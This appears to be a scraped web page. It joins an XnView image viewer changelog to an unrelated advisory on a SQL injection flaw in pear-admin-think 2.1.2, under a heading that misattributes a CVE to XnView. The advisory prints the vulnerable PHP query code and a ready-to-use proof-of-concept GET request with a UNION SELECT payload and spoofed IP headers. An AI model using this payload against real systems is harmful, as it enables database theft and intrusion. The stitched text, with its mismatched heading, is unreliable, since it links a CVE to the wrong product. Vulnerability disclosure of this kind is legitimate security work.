\_\_\_\_ 2.49.3 Changelog

\* Convert 16 to 256 colors - viewtopic.php?f=36&t=39421  
\* Disable ESC to close tabs - viewtopic.php?f=35&t=17078  
\[General\] EscToCloseView=0  
\* Select file from search results & switching mode - viewtopic.php?f=34&t=40063  
\* Title empty when recurse - viewtopic.php?f=36&t=39979  
\* Resize - viewtopic.php?f=35&t=40248  
\* Slideshow: Order of files - viewtopic.php?f=56&t=40087  
\* Fortis Mag fix  
\* NConvert: -wmsize watermark percent size - viewtopic.php?f=57&t=38754  
\* NConvert: canvas size in inches/cm/mm - viewtopic.php?f=57&t=39361  
\* NConvert: replace\_color - viewtopic.php?f=57&t=39769  
\* NConvert: -temperature added

\_\_\_\_ 2.49.2 Changelog

\* Problem with Ghostscript 9.50  
\* PDF font problem - viewtopic.php?f=36&t=39662  
\* CR3 - viewtopic.php?f=35&t=39478  
\* .sld must use 'Recurse' setting - viewtopic.php?f=35&t=39330  
\* GIF loop - viewtopic.php?f=36&t=31689  
\* PAM CMYK

\_\_\_\_ 2.49.1 Changelog

\* TIFF 16bits greyscale

\_\_\_\_ 2.49 Changelog

\* SQLite 3.29.0  
\* NConvert: greater\_than/less\_than condition - viewtopic.php?f=57&t=39147  
\* PSD: Error when writing metadata - viewtopic.php?f=57&t=39137  
\* Export - Problem with RGBA - viewtopic.php?f=36&t=39044  
\* Capture - viewtopic.php?f=36&t=38934  
\* Left/Right F11 to open fullscreen on Left/Right monitor  
\* Create multi file & folder with '.' - viewtopic.php?f=36&t=39008  
\* # to comment line in .sld file  
\* Multipage create: Check if output filename exists  
\* Slideshow crash when using animated GIF - viewtopic.php?f=36&t=38902  
\* XIM format import added  
\* Change timestamp must not use 12h format - viewtopic.php?f=36&t=38702  
\* GIF not played correctly in Slideshow - viewtopic.php?f=34&t=38303  
\* CVE - https://github.com/apriorit/pentesting/ ... ugs/xnview  
\* NConvert: -unsharp  
\* NConvert: -exposure - viewtopic.php?f=57&t=39136  
\* NConvert: -colorize h l s  
\* NConvert: Remove EXIF orientation -exif\_rotation - viewtopic.php?f=57&t=38648  
\* \[Rename\]/TemplateStart, position of number in template - viewtopic.php?f=34&t=38568  
\* CVE-2019-12151  
\* ShellEx: 'Convert...' & input fields

\_\_\_\_ 2.48 Changelog

\* RGB inverted when printing 8bits cmap picture from browser  
\* WebP 32bits  
\* PDF Multipage create - viewtopic.php?f=35&t=38030

\_\_\_\_ 2.47 Changelog

XCF 2.10  
ICNS with JPEG2000 icon  
GIF loop & Quick slideshow - viewtopic.php?f=36&t=31689  
Problem with local charset for image description EXIF field  
\[Start\]/BugBlueLine=1 to remove the bug of blue line  
PDF output without font info - viewtopic.php?f=35&t=38030  
Space must not show tagbox if not enabled  
NConvert: -no\_auto\_rotate - viewtopic.php?f=57&t=38239  
NConvert: -autocrop with position  
NConvert: add -lower to lower case output filename  
NConvert: Bug when output filename contains a numeric enumerator - viewtopic.php?f=57&t=38014

\_\_\_\_ 2.46 Changelog

JPEG2000 YCC - viewtopic.php?f=35&t=37806  
Bad loading for ARW - viewtopic.php?f=36&t=37683  
TIFF with JPEG compression - viewtopic.php?f=35&t=37585  
Adjust dialog clipped - viewtopic.php?f=36&t=32011  
PDF version 1.4 output  
Sqlite 2.24.0  
RLE & ICO vulnerabilities Cody Sixteen from STM Solutions  
NConvert: stdout problem on windows - viewtopic.php?f=57&t=37810

\_\_\_\_ 2.45 Changelog

License written in HKCU  
Support HPI with transparency  
Shows dots under certain conditions - viewtopic.php?f=36&t=37447  
Resize - viewtopic.php?f=36&t=37451  
Blue bar - viewtopic.php?f=36&t=36278  
Resize dialog crash with ^^ - viewtopic.php?f=36&t=36644  
Parameters & External program - viewtopic.php?f=35&t=15465

\_\_\_\_ 2.44 Changelog

Monitor power off during slideshow  
Color profile not used Browser>Print - viewtopic.php?f=36&t=36833  
\-filelist doesn't work anymore  
Tile child window - viewtopic.php?f=56&t=36527  
Strange colors on grey image - viewtopic.php?f=35&t=36485  
UTF8 Exif Image Description

\_\_\_\_ 2.43 Changelog

Better HEIF support - http://www.xnview.com/download/plugins/heif\_x32.zip  
Unwanted file types shown in Viewer - viewtopic.php?f=36&t=35484  
FileListUseExt=1  
Alpha glitch - viewtopic.php?f=36&t=36454  
Folder browsing via command line - viewtopic.php?f=36&t=36434  
Lossless crop corruption - viewtopic.php?f=36&t=36378

\_\_\_\_ 2.42 Changelog

HEIF support - Extract http://www.xnview.com/download/plugins/heif\_x32.zip in Plugins folder

\_\_\_\_ 2.41 Changelog

Basic support for unicode filename  
2Gb limitation on 64bits OS - http://newsgroup.xnview.com/viewtopic.php?f=36&t=35165  
Displaying RGBA image without use alpha - http://newsgroup.xnview.com/viewtopic.php?f=36&t=35809  
Print TIFF with orientation flag in browser - http://newsgroup.xnview.com/viewtopic.php?f=36&t=36197  
GIF loop not saved in .sld - http://newsgroup.xnview.com/viewtopic.php?f=35&t=35991  
Clip support - http://newsgroup.xnview.com/viewtopic.php?f=34&t=28554  
Slideshow crash on RAW files - http://newsgroup.xnview.com/viewtopic.php?f=36&t=34632  
TIF > 2GB & multipage - http://newsgroup.xnview.com/viewtopic.php?f=79&t=35056  
RGBA printing  
Thumbnails upscaling - http://newsgroup.xnview.com/viewtopic.php?f=35&t=36090  
NConvert: -keepdocsize fixed  
NConvert: -shadow - http://newsgroup.xnview.com/viewtopic.php?f=57&t=36163  
NConvert: -align - http://newsgroup.xnview.com/viewtopic.php?f=57&t=36164

\_\_\_\_ 2.40 Changelog

CMYK image default color profile - http://newsgroup.xnview.com/viewtopic.php?f=35&t=31685  
http://newsgroup.xnview.com/viewtopic.php?f=35&t=28839  
RGBA resize (bilinear) - http://newsgroup.xnview.com/viewtopic.php?f=36&t=33425  
http://newsgroup.xnview.com/viewtopic.php?t=29238  
http://newsgroup.xnview.com/viewtopic.php?t=34493  
Ctrl+RMB to copy color - http://newsgroup.xnview.com/viewtopic.php?p=141793  
Capture rectangle on second monitor - http://newsgroup.xnview.com/viewtopic.php?f=56&t=32892  
Print 50+ via command line - http://newsgroup.xnview.com/viewtopic.php?f=35&t=35350  
Filelist to print - http://newsgroup.xnview.com/viewtopic.php?f=34&t=35378  
LIBPNG 1.6.29  
SQLite 3.18.0  
ZLIB 1.2.11  
LCMS 2.8  
BMP 2+10+10+10 - http://newsgroup.xnview.com/viewtopic.php?f=36&t=32577  
Category removed if delete file - http://newsgroup.xnview.com/viewtopic.p ... 2&start=15  
Category moved with Cut/Paste  
8BF & undo - http://newsgroup.xnview.com/viewtopic.php?f=36&t=34508  
'Purge Now' - http://newsgroup.xnview.com/viewtopic.php?f=34&t=32667  
OpenEXR updated - http://newsgroup.xnview.com/viewtopic.php?f=36&t=33039  
Resize gamma correction - http://newsgroup.xnview.com/viewtopic.php?f=34&t=33273  
Change timestamp & DST - http://newsgroup.xnview.com/viewtopic.php?f=36&t=33483  
Selection + Tab - http://newsgroup.xnview.com/viewtopic.php?f=36&t=33983  
GIF loop - http://newsgroup.xnview.com/viewtopic.php?f=35&t=34036  
PAM format - http://newsgroup.xnview.com/viewtopic.php?f=36&t=35132  
JPEG 2000 - http://newsgroup.xnview.com/viewtopic.php?f=36&t=35277  
Maximize on first monitor - http://newsgroup.xnview.com/viewtopic.php?f=36&t=32343  
Resize default size - http://newsgroup.xnview.com/viewtopic.php?f=34&t=33694  
PEF for thumbnail's folder - http://newsgroup.xnview.com/viewtopic.php?f=35&t=35363  
Cancel removed from Setup wizard - http://newsgroup.xnview.com/viewtopic.php?f=34&t=32958  
Previous/Next file & RecognizeByExt == false - http://newsgroup.xnview.com/viewtopic.php?f=36&t=33127  
Next/Previous & video - http://newsgroup.xnview.com/viewtopic.php?f=36&t=35182  
Better dialog for update - http://newsgroup.xnview.com/viewtopic.php?f=34&t=19950  
WebP plugin updated  
OpenJPEG2000 updated  
RIOT addon updated  
PNGOUT updated  
X3F with only embedded JPEG  
NConvert: text with -text\_rotation - http://newsgroup.xnview.com/viewtopic.php?f=57&t=35441  
NConvert: -text\_border added

\_\_\_\_ 2.39 Changelog

no IPTC fields in tooltip/info  
Thumbnail for blend file

\_\_\_\_ 2.38 Changelog

Sort by exif - http://newsgroup.xnview.com/viewtopic.php?f=36&t=32387  
Zooming instead file navigation - http://newsgroup.xnview.com/viewtopic.php?f=36&t=33917

\_\_\_\_ 2.37 Changelog

Better HiDPI support  
Change timestamp and video  
GPS direction - http://newsgroup.xnview.com/viewtopic.php?f=35&t=33587  
Right click (make selection) and delete - http://newsgroup.xnview.com/viewtopic.php?f=36&t=33700  
NConvert: Multipage extract - http://newsgroup.xnview.com/viewtopic.php?f=57&t=33879

\_\_\_\_ 2.36 Changelog

FLIF format added  
SVG support via rsvg-convert.exe - http://newsgroup.xnview.com/viewtopic.php?f=34&t=31748  
Search similar & extension - http://newsgroup.xnview.com/viewtopic.php?f=56&t=32840  
Multipage save doesn't use read settings  
PCT crash - http://newsgroup.xnview.com/viewtopic.php?f=36&t=33025  
NConvert: -t start step for number in output name

\_\_\_\_ 2.35 Changelog

#THUMB\_WIDTH\_MAX# & #THUMB\_HEIGHT\_MAX# - http://newsgroup.xnview.com/viewtopic.php?f=34&t=30652  
JPEGXR  
Backspace not working in fullscreen  
LibPNG 1.6.20  
ZIPPack Addon - http://newsgroup.xnview.com/viewtopic.php?f=35&t=31563

Pierre.

CVE-2021-28427: XnView 2.49.4 - XnView Software

SQL Injection in pear-admin-think version 2.1.2, allows attackers to execute arbitrary code and escalate privileges via crafted GET request to Crud.php.

pear-admin-think V2.1.2 has a sql injection vulnerability

sql injection vulnerability exists in pear-admin-think V2.1.2  
This vulnerability allows remote attackers to obtain user sensitive data and even command execution

url:/admin.php/admin.crud/list/name/admin\_admin?page=1&limit=10  
Vulnerability file:app/admin/controller/admin/Crud.php

        public function list($name)
        {
            $sql = Db::query('SELECT COLUMN_NAME,IS_NULLABLE,DATA_TYPE,IF(COLUMN_COMMENT = "",COLUMN_NAME,COLUMN_COMMENT) COLUMN_COMMENT FROM information_schema.COLUMNS WHERE TABLE_NAME = "' . $name . '"order by ORDINAL_POSITION asc');
            $this->jsonApi('', 0, $sql);
        }
    

Vulnerability exploitation:  
1.Log in backstage  
2.Curd:  
  

poc:

    GET /admin.php/admin.crud/list/name/123"union%20select%201,database(),3,4%23?page=1&limit=10 HTTP/1.1
    Host: www.padmin.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Connection: close
    Referer: http://www.padmin.com/admin.php/admin.crud/index
    Cookie: thinkphp_show_page_trace=0|0; _ga=GA1.2.82281587.1616725844; _gid=GA1.2.1061036003.1616725844; PHPSESSID=24b6f9927555352d4dbfbdf7c145d92a; thinkphp_show_page_trace=0|0; hash=606a3660a4af22638d896476e523344aa470e9b38ea908989711bb9abe5d92b57d31c36a923ed9bd379b16a871efca19b4d6847d9fc88b180e9f620c36a26b8a1f40fc99a846d2ac8eb60b4b4c8cc845
    X-Forwarded-For: 127.0.0.1
    X-Originating-IP: 127.0.0.1
    X-Remote-IP: 127.0.0.1
    X-Remote-Addr: 127.0.0.1

Tag

#sql